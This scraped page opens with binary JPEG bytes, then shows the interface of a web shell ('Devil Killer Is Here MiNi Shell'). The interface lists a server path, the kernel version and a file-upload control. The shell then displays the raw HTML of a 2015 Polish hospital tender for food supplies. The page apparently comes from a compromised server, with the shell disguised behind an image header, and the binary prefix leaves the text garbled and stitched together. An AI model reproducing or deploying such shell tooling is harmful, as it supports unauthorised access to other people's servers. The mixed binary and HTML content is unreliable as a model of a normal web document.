JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151030/158805-N-2015.html

<p class="kh_header"><b>Międzyrzec Podlaski: Sukcesywne dostawy artykułów spożywczych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Międzyrzecu Podlaskim nr sprawy 11/2015/PN</b><br>
<b>Numer ogłoszenia: 158805 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Warszawska 2-4, 21-560 Międzyrzec Podlaski, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> spzozc.w.interia.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.spzozmc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Międzyrzecu Podlaskim nr sprawy 11/2015/PN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzedaż i sukcesywna dostawa artykułów spożywczych do kuchni szpitalnej na rzecz Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Międzyrzecu Podlaskim.
2.	Przedmiot zamówienia według Wspólnego Słownika Zamówień Publicznych:
KOD CPV: 15.00.00.00-8 
3.	Zamówienie obejmuje dostawy według asortymentu i w ilościach wskazanych w formularzach asortymentowo-cenowych od nr 1 do nr 6, stanowiących załącznik nr 2 do SIWZ.
4.	Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części zamówienia, wyszczególnionych w formularzach asortymentowo-cenowych, ale oferta musi obejmować co najmniej jeden pełny zakres przedmiotu zamówienia, wyszczególniony w jednym formularzu asortymentowo-cenowym. 
5.	Dostawy będą odbywać się sukcesywnie do magazynu kuchni SP ZOZ w Międzyrzecu Podlaskim zgodnie z następującymi zasadami:
1)	Formularz asortymentowo-cenowy Nr 1 - Pieczywo
Dostawa pieczywa odbywać się będzie codziennie w godzinach od 5:30 do godziny 07:00. Towar musi być dostarczony następnego dnia od daty złożenia telefonicznego zamówienia 
a w szczególnych przypadkach w ciągu 4 godzin od złożenia zamówienia we wszystkie dni od poniedziałku do niedzieli włącznie. Pojemniki Wykonawcy, w których będą dostarczone produkty, podlegają zwrotowi przy kolejnej dostawie. Wraz z odbiorem pojemników Wykonawca zobowiązany jest odebrać ewentualne zwroty niespożytych produktów. Zwroty 
o których mowa mogą wynosić max 10 % wielkości dostawy. 
2)	Formularz asortymentowo-cenowy Nr 2 - Nabiał i produkty mleczarskie
Dostawa nabiału i produktów mleczarskich musi odbywać się następnego dnia od daty złożenia telefonicznego zamówienia. Średnia częstotliwość dostawy 3 razy w tygodniu lub w zależności od potrzeb Zamawiającego w dni robocze (uwaga: w dni robocze nie wliczamy sobót i niedziel) od chwili otrzymania zamówienia, od poniedziałku do piątku w godz. 6:00 -8:00.
3)	Formularz asortymentowo- cenowy Nr 3 - Ryby
Dostawa ryb odbywać się będzie w zależności od bieżących potrzeb Zamawiającego. Towar musi być dostarczony w terminie do 2 dni od daty złożenia telefonicznego zamówienia. Średnia częstotliwość dostawy 1 raz na tydzień od poniedziałku do czwartku w godz. 7:00 -14:00.
4)	Formularz asortymentowo-cenowy Nr 4 - Jaja kurze
Dostawa jaj odbywać się będzie w zależności od potrzeb Zamawiającego. Towar musi być dostarczony następnego dnia od daty złożenia zamówienia telefonicznego. Średnia częstotliwość dostawy 1 raz w tygodniu od poniedziałku do piątku w godz. 7:00 -14:00.


5)	Formularz asortymentowo-cenowy Nr 5 - Różne artykuły spożywcze 
Dostawa artykułów spożywczych odbywać się będzie w zależności od bieżących potrzeb Zamawiającego. Towar musi być dostarczony w terminie do 1 (jednego) dnia od daty złożenia telefonicznego zamówienia. Średnia częstotliwość dostawy 1 raz na tydzień od poniedziałku do piątku w godz. 7:00 -14:00. Towar musi być dostarczany w opakowaniach i gramaturze podanej w formularzu asortymentowo-cenowym. 
6)	Formularz asortymentowo-cenowy Nr 6 - Mięso i przetwory mięsne 
Dostawa mięsa i przetworów mięsnych odbywać się będzie w zależności od bieżących potrzeb Zamawiającego. Towar musi być dostarczony następnego dnia od daty złożenia telefonicznego zamówienia. Średnia częstotliwość dostawy mięsa i przetworów mięsnych wynosi 5 razy 
w tygodniu lub w zależności od potrzeb Zamawiającego w dni robocze (uwaga: w dni robocze nie wliczamy sobót i niedziel) od chwili otrzymania zamówienia, od poniedziałku do piątku w godz. 6:00 -8:00. Dopuszcza się różnicę wagową pomiędzy złożonym zamówieniem a realizacją dostawy nie więcej niż +/- 200 gram. 
6.	Oferowane wyroby, stanowiące przedmiot postępowania  muszą pochodzić z bieżącej produkcji i posiadać wszelkie wymagane prawem atesty i świadectwa dopuszczające je do obrotu na terytorium Rzeczpospolitej Polskiej. Wykonawca zobowiąże się również, że wraz z dostawą przedmiotu zamówienia dostarczy na żądanie Zamawiającego atesty i świadectwa, o ile są wymagane prawem- wzór stosownych oświadczeń stanowią załączniki nr 3 i 4 do SIWZ.
7.	Terminy ważności dostarczanych wyrobów, towarów, produktów w dniu dostawy, nie mogą być krótsze niż co najmniej 2/3 okresu ich ważności podanego na opakowaniu, w stosunku do daty produkcji.
8.	Zamawiający dopuszcza zaoferowanie produktów w innych opakowaniach niż tych, które są określone w formularzu asortymentowo-cenowym, z odpowiednim przeliczeniem do ilości wymaganej przez Zamawiającego i zaokrągleniem w górę do pełnych opakowań handlowych. Przeliczenia należy uwzględnić w formularzu asortymentowo-cenowym. Każde opakowanie powinno zawierać etykietę zawierającą następujące dane: nazwę wyrobu, datę produkcji, termin ważności,  warunki przechowywania, nazwę i adres producenta.
9.	Jeśli w dokumentacji przetargowej wskazana jest nazwa handlowa firmy, towaru lub produktu, Zamawiający dopuszcza rozwiązania równoważne zgodne z danymi technicznymi i parametrami zawartymi w dokumentacji. Jako rozwiązania równoważne należy rozumieć rozwiązania charakteryzujące się parametrami nie gorszymi od wymaganych, określonych niniejszą SIWZ.
10.	W przypadku złożenia oferty na produkty równoważne, Zamawiający  wymaga dostarczenia produktów w zakresie zamówienia o takich samych walorach smakowo-użytkowych i składzie, przy czym decyzję o uznaniu zaoferowanego produktu za produkt równoważny podejmie Zamawiający. W przypadku zaoferowania produktu równoważnego Wykonawca musi podać jego nazwę w składanej ofercie. Do oferty należy dołączyć próbki oferowanych  produktów równoważnych, pozwalające na ich oceną. Przedstawienie w ofercie towaru uznanego przez Zamawiającego za nie równoważny spowoduje odrzucenie oferty jako niezgodnej z SIWZ.
11.	W przypadku przyznania zamówienia każdą zamawianą partię przedmiotu zamówienia Wykonawca dostarczać będzie do siedziby Zamawiającego na własny koszt i ryzyko zgodnie z zapotrzebowaniem wyrażonym na piśmie, telefonicznie lub za pomocą faxu (dostawa z wniesieniem i rozładunkiem do magazynu Kuchni SPZOZ w Międzyrzecu Podlaskim)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy, którego wzór stanowi załącznik nr 1 do SIWZ; 
2)	co najmniej jeden formularz asortymentowo-cenowy, odpowiadający danej części zamówienia - na podstawie załączonego wzoru formularzy asortymentowo-cenowych od nr 1 do nr 6, stanowiących załącznik nr 2 do SIWZ.
3)	oświadczenie Wykonawcy, że produkty, stanowiące przedmiot umowy pochodzą z bieżącej produkcji i posiadają wszelkie wymagane prawem atesty i świadectwa dopuszczające je do obrotu na terytorium Rzeczpospolitej Polskiej, zgodnie z  załącznikiem nr 3 do SIWZ,
4)	oświadczenie Wykonawcy, że  wraz z dostawą przedmiotu zamówienia przedłoży stosowne dokumenty, certyfikaty, deklaracje, itp. na każde żądanie Zamawiającego w trakcie realizacji umowy dla poszczególnych produktów, o ile są wymagane prawem, zgodnie z  załącznikiem nr 4 do SIWZ. 
5)	pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, potwierdzające uprawnienie osoby lub osób podpisujących ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestracyjnych Wykonawcy, dołączonych do oferty - złożone w oryginale lub notarialnie poświadczonej kopii; 
6)	pisemne umocowanie (pełnomocnictwo) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, stwierdzające ustanowienie pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - złożone w oryginale lub notarialnie poświadczonej kopii, lub inny dokument ustanawiający pełnomocnika (np. umowa konsorcjum / spółki cywilnej, jeżeli zawiera w/w informacje).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej
21-560 Międzyrzec Podlaski
ul. Warszawska 2-4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2015 godzina 12:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
21-560 Międzyrzec Podlaski
ul. Warszawska 2-4
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułki zwykłe duże  90g
Bułki wrocławskie duże  90g
Chleb razowy krojony -blaszka 500 g
Chleb zwykły krojony  a 550 g
Chleb wiejski krojony  a 800 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kefir naturalny 2% (butelka 400ml)
Jogurt (kubek 150 g)
Serek homogenizowany (kubek 150g)
Masło śmietankowe  (kostka )
Mleko 2% luzem   (folia 10 litr.)
Mleko 2% w litrach  (karton 1 litr)
Śmietana 18% kubek 330 g
Śmietana 30% kubek 330 g
Twaróg tłusty  (rożek),  zawartość tłuszczu 7-8%
Ser żółty 1 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z miruny, mrożony,         ze skórką, bez glazury, gramatura 1 szt fileta              240-280g..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, średnie , klasa wagowa L  63-73 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biały barszcz - 40 g
Chrupki kukurydziane - 80 g
Cukier kryształ 1 kg
Cukier puder 400g
Dżem truskawkowy w kapsułkach 25 g
Groch suchy - 400 g
Fasola sucha - 500 g
Groszek konserwowy - puszka 400 g
Herbata granulowana - 100g
Herbata liściasta - 100g
Herbatniki - 100 g
Kasza jęczmienna - 0,5 kg
Kasza manna - 1 kg
Kisiel - 40 g
Koncentrat pomidorowy a 190 g - słoiczek
Kwasek cytrynowy a 20 g
Liść laurowy a 50 g
Majeranek a 100 g
Makaron 1 kg
Margaryna zwykła (kostka) - 250 g
Marmolada wieloowocowa twarda 900 g
Masło roślinne - kubek - 500 g
Mąka pszenna 1 kg, typ 500
Mąka ziemniaczana 1 kg
Miód 25g - Kapselki
Ocet - 0,5 litr
Olej uniwersalny - 1 litr
Pasztet drobiowy 195 g, zawartość surowca z kurcząt min. 33%
Pieprz naturalny a 20 g
Pieprz ziołowy a 20 g
Płatki jęczmienne - 0,5 kg
Płatki owsiane  - 0,5 kg
Płatki kukurydziane - 0,5 kg
Przyprawa w płynie 1 litr 
Przyprawa warzywna do potraw 1 kg, zawartość warzyw suszonych min. 15%
Ryż 1kg
Ser topiony a 100 g
Ser topiony a 30 g
Sól kuchenna, drobna, -  1kg
Susz warzywny a 100 g
Syrop owocowy a 0,5 litr
Ziele angielskie a 12 g
Mieszanka warzywna mrożona - 450 g
Zupa grzybowa w proszku - 40 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Formularz asortymentowo-cenowy nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron gotowany
Ćwiartki z kurczaka
Mięso drobiowe gulaszowe
Filet pieczony z indyka
Kiełbasa kanapkowa
Kiełbasa krakowska
Kiełbasa parówkowa
Kiełbasa zwyczajna
Kości schabowe
Łopatka wieprzowa b/k
Mortadela
Mielonka parzona
Mięso wieprzowe chude
Mięso wołowe na kiełbasę
Parówki 
Pasztet drobiowy
Pasztetowa
Pieczeń  tyrolska
Pierś kurczaka
Polędwica sopocka
Porcje rosołowe drobiowe
Przysmak szynkowy
Przysmak śniadaniowy
Przysmak z indyka
